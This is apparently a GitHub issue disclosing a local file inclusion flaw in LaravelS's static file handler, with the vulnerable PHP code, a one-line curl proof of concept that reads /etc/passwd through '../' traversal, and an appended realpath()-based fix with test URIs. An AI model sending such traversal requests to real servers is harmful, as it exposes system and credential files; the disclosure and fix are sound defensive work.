Local File Inclusion (LFI) vulnerability
zhazhami opened this issue · 1 comments
zhazhami commented
- Your software version (Screenshot of your startup)

| Software | Version |
| --- | --- |
| PHP | 8.1 |
| Swoole | 5.0.2 |
| Laravel/Lumen | 8.83 |
| LaravelS | 3.7.35 |

- Detail description about this issue (error/log)
When the setting "handle_static" is true, LaravelS is affected by an LFI vulnerability.
vulnerable file: /src/Illuminate/Laravel.php
```php
public function handleStatic(IlluminateRequest $request)
{
    $uri = $request->getRequestUri();
    if (isset(self::$staticBlackList[$uri])) {
        return false;
    }

    $uri = (string)str_replace("\0", '', urldecode($uri));
    $requestFile = $this->conf['static_path'] . $uri;
    if (is_file($requestFile)) {
        return $this->createStaticResponse($requestFile, $request);
    }
    ...
```
- Some reproducible code blocks and steps

vulnerability poc

```bash
curl --path-as-is "http://127.0.0.1:5200/../../../../../../etc/passwd"
```
hhxsv5 commented
Thanks.
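One way to close the traversal in the `handleStatic()` snippet from the report, as an added example that is not LaravelS code or the maintainer's fix: canonicalise the candidate path with `realpath()` and serve it only if it stays under the static root. The helper name `resolveStaticFile` and the temporary demo tree are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical helper (illustration only, not LaravelS code): map a request
 * URI to a file under $staticPath, or return null if it escapes that root.
 */
function resolveStaticFile(string $staticPath, string $uri): ?string
{
    // Drop the query string, decode once and strip NUL bytes.
    $path = str_replace("\0", '', urldecode(explode('?', $uri, 2)[0]));

    // realpath() collapses "../" and symlinks; it returns false if the
    // target does not exist.
    $root = realpath($staticPath);
    $file = realpath($staticPath . '/' . ltrim($path, '/'));
    if ($root === false || $file === false || !is_file($file)) {
        return null;
    }

    // Compare against the root plus a trailing separator so that a sibling
    // such as "/srv/public-old" cannot pass as being inside "/srv/public".
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($file, $prefix, strlen($prefix)) === 0 ? $file : null;
}

// Constructed demo tree: public/app.css may be served, secret.txt may not.
$base = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir($base . '/public', 0700, true);
file_put_contents($base . '/public/app.css', 'body{}');
file_put_contents($base . '/secret.txt', 'outside the static root');

$cases = ['/app.css', '/app.css?v=1', '/../secret.txt', '/%2e%2e/secret.txt', '/missing.css'];
foreach ($cases as $uri) {
    $hit = resolveStaticFile($base . '/public', $uri);
    printf("%-20s => %s\n", $uri, $hit === null ? 'rejected' : 'served');
}

// Remove the demo tree.
unlink($base . '/public/app.css');
unlink($base . '/secret.txt');
rmdir($base . '/public');
rmdir($base);
```

Only the first two URIs resolve to a file; both traversal forms canonicalise to a path outside the root and are rejected.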